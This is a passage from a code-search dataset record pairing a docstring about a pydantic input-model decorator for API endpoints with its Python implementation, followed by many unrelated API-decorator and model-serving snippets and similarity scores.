obj.__orig_doc__ = obj.__doc__\n obj.__doc__ = dedent(obj.__doc__).format_map(kwds)\n return obj\n\n return dec", "def api_method(single=False, expected_methods=['get'],\n returns_extra_data=False):\n def decorator(func):\n \"\"\" The decorator applied to the endpoint \"\"\"\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper\n return decorator", "def getHelp(self,func = None):\n if func == None:\n print(self.__doc__)\n pass\n else:\n print(func.__doc__)\n pass", "def api_endpoint(func: Callable[..., Any]) -> Callable[[], Response]:\n method, _, name = func.__name__.partition(\"_\")\n if method not in {\"get\", \"delete\", \"put\"}: # pragma: no cover\n raise ValueError(f\"Invalid endpoint function name: {func.__name__}\")\n validator = validate_func_arguments(func)\n\n @json_api.route(f\"/{name}\", methods=[method])\n @wraps(func)\n def _wrapper() -> Response:\n if validator is not None:\n if method == \"put\":\n request_json = request.get_json(silent=True)\n if request_json is None:\n raise FavaAPIError(\"Invalid JSON request.\")\n data = request_json\n else:\n data = request.args\n res = func(*validator(data))\n else:\n res = func()\n return json_success(res)\n\n return _wrapper", "def decorator(self, decorator: Route.Decorator):\n pass", "def get(self, request, format=None):\n\n an_apiview= [\n 'Uses HTTP methods as functions (get, post, patch, put, delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your logic',\n 'Is mapped manually to URLs',\n 'Douki mohamed',\n ]\n\n return Response({'message': 'Hello Douki!', 'an_apiview': an_apiview})", "def output(self, resource):\n @wraps(resource)\n def wrapper(*args, **kwargs):\n rv = resource(*args, **kwargs)\n rv = self.responder(rv)\n return rv\n\n return wrapper" ]
[ "0.7308593", "0.67804843", "0.67267275", "0.6568308", "0.6500626", "0.6489433", "0.64708114", "0.64436257", "0.63863075", "0.6336464", "0.6331381", "0.6279588", "0.6140457", "0.6124011", "0.6117498", "0.6093394", "0.60924906", "0.60902476", "0.60646194", "0.6054501", "0.6027014", "0.60211873", "0.6004288", "0.5938166", "0.59238946", "0.59083325", "0.5893017", "0.5888402", "0.5886886", "0.5872275", "0.58521104", "0.5845897", "0.5823973", "0.5823973", "0.5823973", "0.58014905", "0.58009076", "0.58001184", "0.5794369", "0.57728714", "0.57677436", "0.5743728", "0.5733115", "0.5728148", "0.5727177", "0.571764", "0.5703117", "0.5702133", "0.56525373", "0.5639798", "0.5632026", "0.5598153", "0.5587369", "0.5587369", "0.55524343", "0.55517614", "0.55465037", "0.55433434", "0.5529697", "0.552758", "0.5525554", "0.55248535", "0.55210143", "0.55167913", "0.55079967", "0.5500769", "0.5471195", "0.5470788", "0.5469618", "0.5469156", "0.54565865", "0.54541284", "0.5443508", "0.54434085", "0.5435016", "0.54185265", "0.5413424", "0.5409794", "0.5409482", "0.53998184", "0.53970253", "0.5395056", "0.53946483", "0.5384517", "0.53587675", "0.53552926", "0.5354524", "0.53544176", "0.5354366", "0.5349263", "0.5346201", "0.5342313", "0.5340289", "0.53402835", "0.5322271", "0.5315195", "0.53085274", "0.53058285", "0.5301867", "0.5288942" ]
0.6823912
1
Decorator to be used in apimethods to convert the requestdata to an instance of the passed `model`. This instance is passed to the decorated apiendpoint as the parameter `service_params`.
def api_inputmodel(api: str, model: BaseModel, servicename: str, service_logger: logger) -> Callable: def decorator(func): @wraps(func) async def function_wrapper(request, *args, **kwargs): try: service_params = model.parse_raw(request.body) except ValidationError as err: msg = (f'API: {api} - invalid params ({request.json}) passed ' f'to {servicename}: {err}') service_logger.warning(msg) raise PreconditionFailed(msg, status_code=412) result = await func(request=request, service_params=service_params, service_logger=service_logger, *args, **kwargs) return result return function_wrapper return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def api_outputmodel(api: str, model: BaseModel, servicename: str,\n service_logger: logger) -> Callable:\n\n def decorator(func):\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n service_result = await func(request, *args, **kwargs)\n try:\n if isinstance(service_result, model):\n result = service_result\n else:\n result = model(**service_result)\n output = response.json(result.dict())\n except Exception as err:\n msg = ('an internal error occured (service: '\n f'{servicename}, api: {api}): {err}')\n raise ServerError(msg)\n service_logger.info(f'processed result {result} => '\n f'{output.content_type} [{output.status}] '\n f'{output.body}')\n return output\n\n return function_wrapper\n\n return decorator", "def opt_model_create_rest_api():\n request_json = request.get_json()\n OptimModelRequestAPI(request_json).validate()\n return create_model_data(request_json)", "def model_to_instance(model):\n pass", "def forward(self, *args: Any, **kwargs: Any) -> Any:\n return self.model(*args, **kwargs)", "def param_converter(*decorator_args, **decorator_kwargs):\n def wrapped(fn):\n @wraps(fn)\n def decorated(*view_args, **view_kwargs):\n if Model is not None:\n view_kwargs = _convert_models(view_kwargs, decorator_kwargs)\n view_kwargs = _convert_query_params(view_kwargs, decorator_kwargs)\n return fn(*view_args, **view_kwargs)\n return decorated\n\n if decorator_args and callable(decorator_args[0]):\n return wrapped(decorator_args[0])\n return wrapped", "def convert_to_model(self, *args):\n services_data, *_ = args\n return [Service(**service) for service in services_data]", "def apply_model(model: BaseModel, **kwargs):\n raise NotImplementedError(f'Unknown model: {model}')", "def __call__(self, x, **kwargs):\n return self.model(x)", "def to_payload(self, model):\n return model", "def model(self, key, model_type:T, default=undefined, description=None, **kwargs) -> T:\n return self._process(key, description=description, default=default, cast=cast_pydantic(model_type),type=model_type, **kwargs)", "def _get_model(\n self,\n model: t.Type[api.ModelMixins],\n start: bool = True,\n auth: t.Optional[AuthModel] = None,\n ) -> t.Any:\n if start:\n self.start()\n\n if model in self.API_CACHE:\n return self.API_CACHE[model]\n\n if not isinstance(auth, AuthModel):\n auth = self.AUTH\n\n self.API_CACHE[model] = model(auth=auth, log_level=self.API_LOG_LEVEL)\n return self.API_CACHE[model]", "def decorator(cls):\n\n instance = cls(*args, **kwargs)\n serializer_services.register_serializer(instance, **kwargs)\n\n return cls", "def convert_to_model(self, *args):", "def from_model(model):\n ret = model2json(model)\n return JsonBody(ret['body'])", "def api_method(func):\n @wraps(func)\n def decorator(self, return_request_args=False, *args, **kwargs):\n request_args = func(self, *args, **kwargs)\n request_args.update({\n 'method': '{module}.{method}'.format(\n module=self.__class__.__name__,\n method=func.__name__)})\n request_args = self._preprocess(request_args)\n if return_request_args:\n return request_args\n else:\n return self.pa.request(**request_args)\n return decorator", "def get_model(self, payload):\n return super(BulkEntryTransformer, self).to_model(payload)", "def get_model_instance(model,baseclass=None,nvarparams=1,**kwargs):\n if isinstance(model,ParametricModel if baseclass is None else baseclass):\n for k,v in kwargs.iteritems():\n setattr(model,k,v)\n return model\n else:\n cls = get_model_class(model,baseclass)\n args = (nvarparams,) if cls.isVarnumModel() else tuple()\n return cls(*args,**kwargs)", "def to_api_data(self):\n raise NotImplementedError()", "def api_documentation(api: str, summary: str, in_model: BaseModel,\n out_model: BaseModel, out_description: str) -> Callable:\n for model, name in ((in_model, 'Input'), (out_model, 'Output')):\n doc.Object(\n make_dataclass(\n f'Api{api[1:].title()}{name}',\n [(key, val.type_, val.type_)\n for key, val in model.__dict__['__fields__'].items()]))\n im_returns = doc.JsonBody({\n key: val.type_\n for key, val in in_model.__dict__['__fields__'].items()\n })\n\n om_returns = {\n key: val.type_\n for key, val in out_model.__dict__['__fields__'].items()\n }\n\n def decorator(func):\n @doc.summary(summary)\n @doc.response(412,\n 'Error: Precondition Failed',\n description='The passed request-parameters are invalid')\n @doc.response(500,\n 'Error: Server-Error occured',\n description='An internal error occured')\n @doc.consumes(im_returns,\n content_type='application/json',\n location='body')\n @doc.produces(om_returns,\n content_type='application/json',\n description=out_description)\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n return await func(request=request, *args, **kwargs)\n\n return function_wrapper\n\n return decorator", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def update(self, datastore, model, **kwargs):\n for k, v in self._preprocess_params(kwargs).items():\n setattr(model, k, v)\n self.save(datastore, model)\n return model", "def api_field_from_django_field(cls, f, default=CharField):\n if isinstance(f, JSONField):\n return JSONApiField\n \n return super(PandaModelResource, cls).api_field_from_django_field(f, default)", "def to_model(self, payload):\n if self.skip:\n raise SkipField\n\n model = self.get_or_initialize_model(payload)\n model = self.update_model_fields(model, payload)\n return model", "def json_to_model(cls, data):\n m = cls.to_model(data)\n m.raw = data\n cls._unlock_unmarshalling(m)\n cls.set_additional_fields(m, data)\n return m", "def model(self) -> Type[Model]:", "def _create_response_model(self, data):\n pass", "def update(self, model, **kwargs):\n self._isinstance(model)\n for k, v in self._preprocess_params(kwargs).items():\n setattr(model, k, v)\n self.save(model)\n return model", "def __init__(self, endpoint_name, sagemaker_session=None,\n serializer=json_serializer,\n deserializer=json_deserializer,\n content_type=None,\n model_name=None,\n model_version=None):\n super(Predictor, self).__init__(endpoint_name, sagemaker_session, serializer,\n deserializer, content_type)\n\n attributes = []\n if model_name:\n attributes.append('tfs-model-name={}'.format(model_name))\n if model_version:\n attributes.append('tfs-model-version={}'.format(model_version))\n self._model_attributes = ','.join(attributes) if attributes else None", "def proxy(self, modelcls):\n return ModelProxy(self, modelcls)", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, model: object):\n self.model = model", "def fromRequest(cls, req):\n raise NotImplementedError(\n 'fromRequest is not implemented on %r' % (cls.__name__,))", "def __call__(self):\n return self.cls(**self.kwargs)", "def _update_param_dict_decorator(self, component_model, func_name):\n\n def decorated_func(*args, **kwargs):\n\n # Update the param_dict as necessary\n for key in self.param_dict.keys():\n if key in component_model.param_dict:\n component_model.param_dict[key] = self.param_dict[key]\n\n func = getattr(component_model, func_name)\n return func(*args, **kwargs)\n\n return decorated_func", "def _convert_into_model_endpoint_object(\n endpoint: typing.Dict[str, typing.Any], feature_analysis: bool = False\n ) -> mlrun.common.schemas.ModelEndpoint:\n\n # Convert into `ModelEndpoint` object\n endpoint_obj = mlrun.common.schemas.ModelEndpoint().from_flat_dict(endpoint)\n\n # If feature analysis was applied, add feature stats and current stats to the model endpoint result\n if feature_analysis and endpoint_obj.spec.feature_names:\n endpoint_features = (\n mlrun.api.crud.model_monitoring.deployment.get_endpoint_features(\n feature_names=endpoint_obj.spec.feature_names,\n feature_stats=endpoint_obj.status.feature_stats,\n current_stats=endpoint_obj.status.current_stats,\n )\n )\n if endpoint_features:\n endpoint_obj.status.features = endpoint_features\n # Add the latest drift measures results (calculated by the model monitoring batch)\n drift_measures = mlrun.api.crud.model_monitoring.helpers.json_loads_if_not_none(\n endpoint.get(\n mlrun.common.schemas.model_monitoring.EventFieldType.DRIFT_MEASURES\n )\n )\n endpoint_obj.status.drift_measures = drift_measures\n\n return endpoint_obj", "def model_wrapper(cls):\n return _create_wrapper_cls(cls, reset_mutation_uid=True, stop_parsing=False)", "def make_instance(self, data, **kwargs):\n instance = self.instance or self.get_instance(data)\n if instance is not None:\n for key, value in iteritems(data):\n setattr(instance, key, value)\n return instance\n kwargs, association_attrs = self._split_model_kwargs_association(data)\n instance = self.opts.model(**kwargs)\n for attr, value in iteritems(association_attrs):\n setattr(instance, attr, value)\n return instance", "def _get_latest_model(cls, model, spec):\n if hasattr(model, \"KEY\") and model.KEY is not None:\n spec[\"content\"] = model\n model = cls\n elif hasattr(model, \"STRUCT\"):\n spec[\"content\"] = model.STRUCT\n else:\n # Is a dict\n spec[\"content\"] = model\n spec[\"object\"] = model\n return model", "def make_request(self: BaseApi,) -> typing.Dict[str, int]:\n\n def serialize_item(item):\n if isinstance(item, pydantic.BaseModel):\n return item.dict()\n return item\n\n body = None\n\n m = ApiRequest(\n method=\"GET\",\n path=\"/api/v3/store/inventory\".format(),\n content_type=None,\n body=body,\n headers=self._only_provided({}),\n query_params=self._only_provided({}),\n cookies=self._only_provided({}),\n )\n return self.make_request({\"200\": {\"application/json\": typing.Dict[str, int],},}, m)", "def __call__(self, X):\n return self.model(X)", "def to_model(self, payload):\n return payload", "def __init__(self, *, model_func, client=None, verbose=False, **kwargs):\n super().__init__(client=client, verbose=verbose, **kwargs)\n self._model_func = model_func", "def from_json(cls: Type[T], value: JsonResponse, **kwargs) -> 'BaseModel':\n attr_names = [a.lstrip('_') for a in fields_dict(cls)]\n if cls.temp_attrs:\n attr_names.extend(cls.temp_attrs)\n valid_json = {k: v for k, v in value.items() if k in attr_names and v is not None}\n return cls(**valid_json, **kwargs) # type: ignore", "def get_model(*args):\n return Model()", "def make(model: Type[Model], **kwargs: Any) -> Model:\n return modelfactory_factory(model)(**kwargs)", "def _from_openapi_data(cls, *args, **kwargs): # noqa: E501\n\n _check_type = kwargs.pop('_check_type', True)\n _spec_property_naming = kwargs.pop('_spec_property_naming', False)\n _path_to_item = kwargs.pop('_path_to_item', ())\n _configuration = kwargs.pop('_configuration', None)\n _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())\n\n self = super(OpenApiModel, cls).__new__(cls)\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n return self", "def _old_request_model(self, instance, success):\n coll = self.get_collection('_model')\n callback = partial(self._do_validate,\n instance=instance,\n success=success)\n try:\n instance['_model']\n except KeyError:\n raise tornado.web.HTTPError(400, 'Missing model key')\n coll.find_one({'_id': instance['_model']},\n callback=callback)", "def beta_create_ModelService_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('google.cloud.ml.v1.ModelService', 'CreateModel'): CreateModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'CreateVersion'): CreateVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'DeleteModel'): DeleteModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'DeleteVersion'): DeleteVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'GetModel'): GetModelRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'GetVersion'): GetVersionRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'ListModels'): ListModelsRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'ListVersions'): ListVersionsRequest.SerializeToString,\n ('google.cloud.ml.v1.ModelService', 'SetDefaultVersion'): SetDefaultVersionRequest.SerializeToString,\n }\n response_deserializers = {\n ('google.cloud.ml.v1.ModelService', 'CreateModel'): Model.FromString,\n ('google.cloud.ml.v1.ModelService', 'CreateVersion'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'DeleteModel'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'DeleteVersion'): google_dot_longrunning_dot_operations__pb2.Operation.FromString,\n ('google.cloud.ml.v1.ModelService', 'GetModel'): Model.FromString,\n ('google.cloud.ml.v1.ModelService', 'GetVersion'): Version.FromString,\n ('google.cloud.ml.v1.ModelService', 'ListModels'): ListModelsResponse.FromString,\n ('google.cloud.ml.v1.ModelService', 'ListVersions'): ListVersionsResponse.FromString,\n ('google.cloud.ml.v1.ModelService', 'SetDefaultVersion'): Version.FromString,\n }\n cardinalities = {\n 'CreateModel': cardinality.Cardinality.UNARY_UNARY,\n 'CreateVersion': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteModel': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteVersion': cardinality.Cardinality.UNARY_UNARY,\n 'GetModel': cardinality.Cardinality.UNARY_UNARY,\n 'GetVersion': cardinality.Cardinality.UNARY_UNARY,\n 'ListModels': cardinality.Cardinality.UNARY_UNARY,\n 'ListVersions': cardinality.Cardinality.UNARY_UNARY,\n 'SetDefaultVersion': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'google.cloud.ml.v1.ModelService', cardinalities, options=stub_options)", "def update_model(model, data, encoders, epochs, batch_size):\n model.fit(\n dict(data.drop(\"total_return\", axis=1)),\n data.total_return,\n epochs=epochs,\n batch_size=batch_size,\n verbose=False,\n )\n\n factors = pd.DataFrame(model.get_layer(\"date_embedding\").get_weights()[0]).reindex(\n data.date.unique()\n )\n\n loadings = pd.DataFrame(\n model.get_layer(\"ticker_embedding\").get_weights()[0]\n ).reindex(data.ticker.unique())\n\n loadings.index = encoders[\"ticker\"].inverse_transform(loadings.index)\n\n # rotating loadings so the factors are uncorrelated and unit variance\n rotated_loadings = loadings.dot(np.linalg.cholesky(factors.cov()))\n rotated_loadings.index.name = \"ticker\"\n rotated_loadings.columns.name = \"factor\"\n return rotated_loadings", "def invoke_model_api(self, md_name, edge, token, request_id=None, **payload):\n headers = {'Authorization': 'Bearer {}'.format(token)}\n if request_id:\n headers[legion_headers.MODEL_REQUEST_ID] = request_id\n\n url = f'{edge}/model/{md_name}/api/model/invoke'\n\n print('Requesting {} with data = {} in POST mode'.format(url, payload))\n\n payload = {\n 'data': [list(payload.values())],\n 'columns': list(payload.keys()),\n }\n\n response = requests.post(\n url,\n json=payload,\n headers=headers\n )\n\n if not response.ok:\n raise Exception(f'Returned wrong status code: {response.status_code}, body: {response.text},'\n f' payload: {payload}')\n\n self._last_response_id = response.headers.get(legion_headers.MODEL_REQUEST_ID)\n self._last_response = response.json()\n return self._last_response", "def get_model(\n model: PipelineModel,\n use_auth_token: Union[Text, None] = None,\n) -> Model:\n\n if isinstance(model, Model):\n pass\n\n elif isinstance(model, Text):\n model = Model.from_pretrained(\n model, use_auth_token=use_auth_token, strict=False\n )\n\n elif isinstance(model, Mapping):\n model.setdefault(\"use_auth_token\", use_auth_token)\n model = Model.from_pretrained(**model)\n\n else:\n raise TypeError(\n f\"Unsupported type ({type(model)}) for loading model: \"\n f\"expected `str` or `dict`.\"\n )\n\n model.eval()\n return model", "def wrapper(resource, request, ** kwargs):\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)", "def get_model(model=gin.REQUIRED):\n return model", "def instance_to_model(self):\n pass", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def model() -> Model:\n return Model()", "def convert_to_model(self, *args):\n rt_xref_service_data, *_ = args\n return [RealtyTypeXRefService(**rt_xref_service) for rt_xref_service in rt_xref_service_data]", "def __call__(self, # pylint: disable=arguments-differ, useless-super-delegation\n features, labels, params=None, config=None):\n return super(BaseModel, self).__call__(features, labels, params, config)", "def get_response_model_ctor(self):\n return self._response_model_ctor", "def __init__(self, model):\n self._model = model", "def add_interface(cls, model, context, model_name, data={}, *args, **kwargs):\n\n # Wrap the fit method:\n def fit_wrapper(fit_method, **kwargs):\n def wrapper(*args, **kwargs):\n # Call the original fit method\n fit_method(*args, **kwargs)\n\n # Original fit method\n setattr(model, \"fit\", fit_method)\n\n # Post fit\n _post_fit(*args, **kwargs)\n\n return wrapper\n\n setattr(model, \"fit\", fit_wrapper(model.fit, **kwargs))\n\n def _post_fit(*args, **kwargs):\n eval_metrics = None\n context.set_label(\"class\", str(model.__class__.__name__))\n\n # Identify splits and build test set\n X_train = args[0]\n y_train = args[1]\n train_set = pd.concat([X_train, y_train], axis=1)\n train_set.reset_index(drop=True, inplace=True)\n\n if data.get(\"X_test\") is not None and data.get(\"y_test\") is not None:\n # Identify splits and build test set\n X_test = data[\"X_test\"]\n y_test = data[\"y_test\"]\n test_set = pd.concat([X_test, y_test], axis=1)\n test_set.reset_index(drop=True, inplace=True)\n\n # Evaluate model results and get the evaluation metrics\n eval_metrics = eval_model_v2(context, X_test, y_test, model)\n\n if data.get(\"generate_test_set\"):\n # Log test dataset\n context.log_dataset(\n \"test_set\",\n df=test_set,\n format=\"parquet\",\n index=False,\n labels={\"data-type\": \"held-out\"},\n artifact_path=context.artifact_subpath(\"data\"),\n )\n\n # Log fitted model and metrics\n label_column = (\n y_train.name\n if isinstance(y_train, pd.Series)\n else y_train.columns.to_list()\n )\n context.log_model(\n model_name or \"model\",\n db_key=model_name,\n body=dumps(model),\n artifact_path=context.artifact_subpath(\"models\"),\n framework=f\"{str(model.__module__).split('.')[0]}\",\n algorithm=str(model.__class__.__name__),\n model_file=f\"{str(model.__class__.__name__)}.pkl\",\n metrics=context.results,\n format=\"pkl\",\n training_set=train_set,\n label_column=label_column,\n extra_data=eval_metrics,\n )", "def model(self, model):\n \n self._model = model", "def GetModel(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def factory(bigquery_model):\n def _create_bigquery_http_request(*args, **kwargs):\n captured_model = bigquery_model\n return BigQueryHttp(captured_model, *args, **kwargs)\n\n return _create_bigquery_http_request", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def as_api_parameters(self):\n raise NotImplementedError(\n 'as_api_parameters not implemented on ' + self.__class__)", "def update_model_kwargs(model_default):\n def model_update_decorator(func):\n\n @functools.wraps(func)\n def update_wrapper(*args, **kwargs):\n updated_kwargs = update_model_kwargs_logic(model_default, kwargs)\n if 'verbose' in updated_kwargs:\n if updated_kwargs['verbose'] > 0:\n # Print out the full updated kwargs\n print(\"INFO:kgcnn: Updated model kwargs:\")\n pprint.pprint(updated_kwargs)\n\n return func(*args, **updated_kwargs)\n\n return update_wrapper\n\n return model_update_decorator", "def create_model_endpoint(\n cls,\n db_session: sqlalchemy.orm.Session,\n model_endpoint: mlrun.common.schemas.ModelEndpoint,\n ) -> mlrun.common.schemas.ModelEndpoint:\n\n if model_endpoint.spec.model_uri or model_endpoint.status.feature_stats:\n logger.info(\n \"Getting feature metadata\",\n project=model_endpoint.metadata.project,\n model=model_endpoint.spec.model,\n function=model_endpoint.spec.function_uri,\n model_uri=model_endpoint.spec.model_uri,\n )\n\n # If model artifact was supplied, grab model metadata from artifact\n if model_endpoint.spec.model_uri:\n logger.info(\n \"Getting model object, inferring column names and collecting feature stats\"\n )\n run_db = mlrun.api.api.utils.get_run_db_instance(db_session)\n model_obj: mlrun.artifacts.ModelArtifact = (\n mlrun.datastore.store_resources.get_store_resource(\n model_endpoint.spec.model_uri, db=run_db\n )\n )\n\n # Get stats from model object if not found in model endpoint object\n if not model_endpoint.status.feature_stats and hasattr(\n model_obj, \"feature_stats\"\n ):\n if model_obj.spec.feature_stats:\n mlrun.common.model_monitoring.helpers.pad_features_hist(\n mlrun.common.model_monitoring.helpers.FeatureStats(\n model_obj.spec.feature_stats\n )\n )\n model_endpoint.status.feature_stats = model_obj.spec.feature_stats\n # Get labels from model object if not found in model endpoint object\n if not model_endpoint.spec.label_names and model_obj.spec.outputs:\n model_label_names = [\n mlrun.api.crud.model_monitoring.helpers.clean_feature_name(f.name)\n for f in model_obj.spec.outputs\n ]\n model_endpoint.spec.label_names = model_label_names\n\n # Get algorithm from model object if not found in model endpoint object\n if not model_endpoint.spec.algorithm and model_obj.spec.algorithm:\n model_endpoint.spec.algorithm = model_obj.spec.algorithm\n\n # Create monitoring feature set if monitoring found in model endpoint object\n if (\n model_endpoint.spec.monitoring_mode\n == mlrun.common.schemas.model_monitoring.ModelMonitoringMode.enabled.value\n ):\n monitoring_feature_set = cls.create_monitoring_feature_set(\n model_endpoint, model_obj, db_session, run_db\n )\n # Link model endpoint object to feature set URI\n model_endpoint.status.monitoring_feature_set_uri = (\n monitoring_feature_set.uri\n )\n\n # If feature_stats was either populated by model_uri or by manual input, make sure to keep the names\n # of the features. If feature_names was supplied, replace the names set in feature_stats, otherwise - make\n # sure to keep a clean version of the names\n if model_endpoint.status.feature_stats:\n logger.info(\"Feature stats found, cleaning feature names\")\n if model_endpoint.spec.feature_names:\n # Validate that the length of feature_stats is equal to the length of feature_names and label_names\n cls._validate_length_features_and_labels(model_endpoint=model_endpoint)\n\n # Clean feature names in both feature_stats and feature_names\n (\n model_endpoint.status.feature_stats,\n model_endpoint.spec.feature_names,\n ) = cls._adjust_feature_names_and_stats(model_endpoint=model_endpoint)\n\n logger.info(\n \"Done preparing feature names and stats\",\n feature_names=model_endpoint.spec.feature_names,\n )\n\n # If none of the above was supplied, feature names will be assigned on first contact with the model monitoring\n # system\n logger.info(\"Creating model endpoint\", endpoint_id=model_endpoint.metadata.uid)\n\n # Write the new model endpoint\n model_endpoint_store = get_model_endpoint_store(\n project=model_endpoint.metadata.project,\n secret_provider=mlrun.api.crud.secrets.get_project_secret_provider(\n project=model_endpoint.metadata.project\n ),\n )\n model_endpoint_store.write_model_endpoint(endpoint=model_endpoint.flat_dict())\n\n logger.info(\"Model endpoint created\", endpoint_id=model_endpoint.metadata.uid)\n\n return model_endpoint", "def create(self, validated_data):\n ModelClass = self.Meta.model\n instance = ModelClass()\n self.instance = instance\n for key, value in validated_data.items():\n setattr(instance, key, value)\n return super().create(validated_data)", "def get_request_kwargs(self, api_params, *args, **kwargs):\n serialized = self.serialize_data(kwargs.get(\"data\"))\n kwargs[\"data\"] = self.format_data_to_request(serialized)\n return kwargs", "def convert_to_model(self, *args):\n city_xref_service_data, *_ = args\n return [CityXRefService(**city_xref_service) for city_xref_service in city_xref_service_data]", "def create(self, validated_data):\n return API.objects.create(**validated_data)", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(AlignModelSrvRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n else:\n self.model = articulation_msgs.msg.ModelMsg()\n self.data = articulation_msgs.msg.ModelMsg()", "def convert_to_single_model(realty_data):\n return Realty(**realty_data)", "def _delegate(self, name, *args, **kwargs):\n func = getattr(self.model_obj, name)\n res = func(*args, **kwargs)\n return res", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def hydrate_from_staff_api(sender, instance, **kwargs):\n if instance.pk:\n return\n\n instance.sync_with_staff_api()", "def __get__(self, model_instance, model_class):\n if model_instance is None:\n return self\n return self.calc_fn(model_instance)", "def _predict_preproc_model(self, model_cfg, model,):\n model = self._make_model(model_cfg['model_name'], databunch=self._data)\n model.model_param = model_cfg['model_param']\n model.wrapper_params = model_cfg['wrapper_params']\n return(model)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise 